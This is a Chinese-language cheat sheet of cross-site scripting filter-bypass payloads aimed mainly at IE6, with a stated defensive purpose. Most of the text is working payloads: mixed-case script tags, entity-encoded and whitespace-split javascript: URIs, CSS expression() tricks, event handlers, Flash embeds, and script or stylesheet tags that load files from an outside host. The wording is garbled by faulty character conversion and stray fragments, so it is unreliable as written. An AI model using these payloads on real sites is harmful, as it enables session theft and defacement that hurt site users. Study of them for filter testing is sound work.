XSS的常見變換--XSS***發展

XSS不具備瀏覽器通用性。不一樣的瀏覽器對同一XSS的適用不同。相比較而言，IE8和Firefox相對更安全，自己就對XSS***有更嚴格的過濾。而IE6的安全性通常，即便***者的代碼有些「變形」，瀏覽器仍是會「盡力而爲」的解析。而其餘的一些瀏覽器如opera，XSS安全處理可能作得更差。

本文基本上是在IE6的基礎上給你們分析XSS的變形和繞過。以便你們有針對性的防禦。做者參閱了互聯網上一些XSS***實戰的例子，彙總成此文。

1、具體內容

XSS的通常原始構造:

<script>alert("anyunix")</script>

上述構造方式因爲太過直接而容易被過濾，實際上，針對不一樣站點的不一樣過濾機制，對原始構造的適當變形有時就能繞過很多對XSS的檢測。

2、發展

1:很簡單，你們都知道會把<script>過濾掉,卻每每忽略了大小寫:

<sCripT>alert("anyunix")</Script>

2:<script>完全被過濾了也沒關係，不少對象能夠支持「javascript:」的形式代碼執行:

<IMG javascript:alert("anyunix")>< /p>

3：當簡單的"javascript"形式也被完全過濾後。咱們發現不少對象支持「&#ASCII」的表示方法，

<img j&#97vascript:alert("anyunix")>< /p>

<img j&#97;vascript:alert('anyunix')>< /p>

<img j&#x61vascript:alert('anyunix')>< /p>

<img j&#x61;vascript:alert('anyunix')>< /p>

&#97能夠寫成&#097,&#0097直至&#0000097也是能夠執行的。

&#x61也是能夠寫成&#061,&#0061直至&#000061的。

4:若是上述編碼亦被還原過濾，能夠填入空格、製表符、換行符等空白字符：

<IMG SRC="jav ascript:alert('anyunix');">

5:也能夠嵌入編碼事後的TAB鍵等,char09,char10,char13均可以被嵌入:

<IMG SRC="jav&#x09;ascript:alert('anyunix');">

<IMG SRC="jav&#x0A;ascript:alert('anyunix');">

<IMG SRC="jav&#x0D;ascript:alert('anyunix');">

6:當直接用「javascript」終於被完全禁絕，咱們還可使用其餘屬性執行XSS。

<DIV STYLE="width:alert('anyunix'));">< /p>

<IMG SRC='vbscript:msgbox("anyunix")'>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

7:而後，理所固然衍生了新的繞過方式和利用形式。

A):插入註釋/*....*/作干擾

<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">

B):全角字符的干擾

<DIV STYLE="width:ｅｘpreｓsion(alert('anyunix'));">

C):「\」的干擾

<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>

8:若是直接執行被徹底過濾，那咱們就利用事件來執行XSS

<img src="#"onerror=alert('anyunix')>

<img src=http://p_w_picpaths.51cto.com/files/uploadimg/20130407/1014480.png"onmousemove=alert(163)>

<BODY ONLOAD=alert('anyunix')>

<isindex type=p_w_picpathsrc=1onerror=alert('anyunix')>

9:flash能夠用來執行XSS

<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>

10:也能夠利用各類其餘標籤

<BODY BACKGROUND="alert('XSS')">< /p>

<IMG DYNSRC="alert('XSS')">< /p>

<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">

<TABLE BACKGROUND="alert('XSS')">< /p>

其餘的一些用於混淆、干擾和繞過的bypass實例:

<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out

<IMG SRC="&#14; alert('XSS');">< /p>

如上，就是一些比較常見和實用的XSS繞過方法。在實際的運用中，每每是多種方法結合起來。

更多更詳盡的XSS測試腳本，可參見http://ha.ckers.org/xss.html建議參閱《OWASP測試指南》，對一些相關的web安全知識作全面的瞭解。

By:anyunix